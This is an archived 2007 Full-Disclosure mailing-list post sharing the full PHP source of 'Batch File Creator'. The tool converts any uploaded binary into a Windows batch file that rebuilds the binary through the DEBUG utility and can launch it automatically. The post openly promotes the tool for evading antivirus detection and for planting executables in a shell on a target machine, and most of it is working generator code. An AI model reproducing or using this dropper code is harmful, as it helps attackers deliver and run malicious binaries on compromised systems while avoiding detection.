lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Mon, 5 Feb 2007 23:18:56 -0600
From: SirDarckCat <sirdarckcat@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Batch File Creator (A batch file that can create
	a program (exe, bat, mp3,
	etc..) and execute it without downloading anything)

*PHP BatchFileCreator (batch program that makes and execute a program)

If you have a shell, and you want to send a file, you need to use FTP to
process it, or to try to compile it there.. anyway, this code, will generate
a batch file that will create the specified file and optionally execute it.

It is usefull to any person that wants to:

1.- Encrypt a file content, or avoid Antivirus detection.
2.- Make a batch file that serves as an installation program.
3.- Create a binary program at an ASCII (plain text) windows shell.

*Steps for making your batch programs:
1.- Send the file to http://sirdarckcat.awardspace.com/BFC.php
2.- Download the batch file that it will create.
3.- Execute it in your target.

The source code of the PHP program is this:

<?php
/**
* Batch File Creator
*  By SirDarckCat from elhacker.net
*  Program distributed under the GNU - GPL License
**/
if(isset($_FILES['attachment']['name']) &&
$_FILES['attachment']['size']<=65535){
if ($_FILES['attachment']['size']==0){
	echo "PHP.INI settings, doesn?t allow me to process your file, or you
did something wrong\r\n";
exit;
}
header("Content-Type: text/plain");
header("Content-Disposition: attachment;filename=\"BFC".rand(0,5012).".bat\"");
	$rn=$_FILES['attachment']['name'];
	$tn="s".rand(0,100)."x.txt";
	$z=(isset($_REQUEST['autostart']))?"start $rn":"EXIT";
	$x=file_get_contents($_FILES['attachment']['tmp_name']);
	echo "@echo off\r\n
	REM BatchFileCreator 0.1
	REM 	By SirDarckCat from elhacker.net
	REM Visit http://sirdarckcat.googlepages.com/bfc
\r\n:rx
\r\nif EXIST shell.x (
	echo Loading..
	start \"Loading..\" /MIN /WAIT cmd /C debug^<shell.x
	if EXIST \"$rn\" (
		del \"$rn\"
	)
	ren $tn,\"$rn\"
	start cmd /C del shell.x
	$z
	goto:EOF
) ELSE (
	call:cds
	call:rx
	start cmd /C del shell.x
	goto:EOF
)
	\r\n:cds
	\r\necho n $tn >shell.x\r\ntype %~nx0|find \"e \"|find /v
\"REM\">>shell.x\r\necho rcx>>shell.x\r\necho
".base_convert(strlen($x),10,16).">>shell.x\r\necho
w".((isset($_REQUEST['binary']))?"0":" ")." >>shell.x\r\necho
q>>shell.x\r\ngoto:EOF\r\n";
	
	$bin=(isset($_REQUEST['binary']))?0:256;
	
	for ($i=$bin;$i<strlen($x)+$bin;$i++){
		if (!($i%16)){
			echo "\r\ne ".base_convert($i,10,16)." ";
		}
		echo substr("00".base_convert(ord($x[$i-$bin]),10,16),-2)." ";
	}
	echo "\r\n REM EOF\r\n";
}else if (isset($_FILES['attachment']['name']) &&
$_FILES['attachment']['size']>65535){
	header("Content-Type: text/plain");
	header("Content-Disposition: attachment;filename=\"BFC".rand(0,5012).".bat\"");
	@ob_start('ob_gzhandler'); // This are larger files, so we better
compress them :P
	$tn="s".rand(0,100);
	$rn=$_FILES['attachment']['name'];
	$m=file_get_contents($_FILES['attachment']['tmp_name']);
	$xx=strlen($m)/65000;
	$z=(isset($_REQUEST['autostart']))?"start \"\" \"$rn\"":"EXIT";
	echo "@echo off

		REM BatchFileCreator 0.1
		REM 	By SirDarckCat from elhacker.net
		REM Visit http://sirdarckcat.googlepages.com/bfc
		
	IF \"%~1\"==\"\" (
		echo Loading..
		start \"Loading..\" /MIN /WAIT cmd /C \"%~nx0 xD\"^|debug
		copy /Y /B $tn.*,\"$rn\"
		del $tn.*
		$z
	) ELSE (\r\n";
		for ($j=0;$j<$xx;$j++){
			$x=substr($m,$j*65000,65000);
			echo "echo n $tn.p$j";
			$sl=strlen($x);
			for ($i=0;$i<$sl;$i++){
				if (!($i%16)){
					echo "\r\necho e ".base_convert($i,10,16)." ";
				}
				echo substr("00".base_convert(ord($x[$i]),10,16),-2)." ";
			}
			
			echo "\r\necho rcx\r\n";
			echo "echo ".base_convert(strlen($x),10,16)."\r\n";
			echo "echo w 0\r\n";
		}
		echo "echo q\r\n";
	echo ")";
}else{
	?>
<html>
<head>
<title>BatchFileCreator 0.1 by sirdarckcat</title>
</head>
<body>	
	<center>
	<h1>BatchFileCreator 0.1</h1>
	<h3>by sirdarckcat</h3>
	<h5>elhacker.net</h5></center>
	<hr>
	<pre>
		With this program you can create a batch file that when is executed,
will generate
		and (optionally) execute a binary file.
		
		Select the file you want to upload, then submit. With a very large file your
		computer may be unable to process it. (MaxSize: 2 MegaBytes)
	</pre><table align=center>
	<form method=POST ENCTYPE="multipart/form-data" action="?download">
	<input type=checkbox name=autostart value=1> - Autostart when is created?<br>
	<input type=checkbox name=binary value=1> - Binary?<br>
	File: <input type=file name=attachment> <br></table>
	<hr><center>
	<input type=submit></center>
	</form>
</body>
</html>
	<?php
}
?>


Hope its usefull :)

Greetz!!
-- 
Att.
SirDarckCat@...il.com

http://www.google.com/search?q=sirdarckcat

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ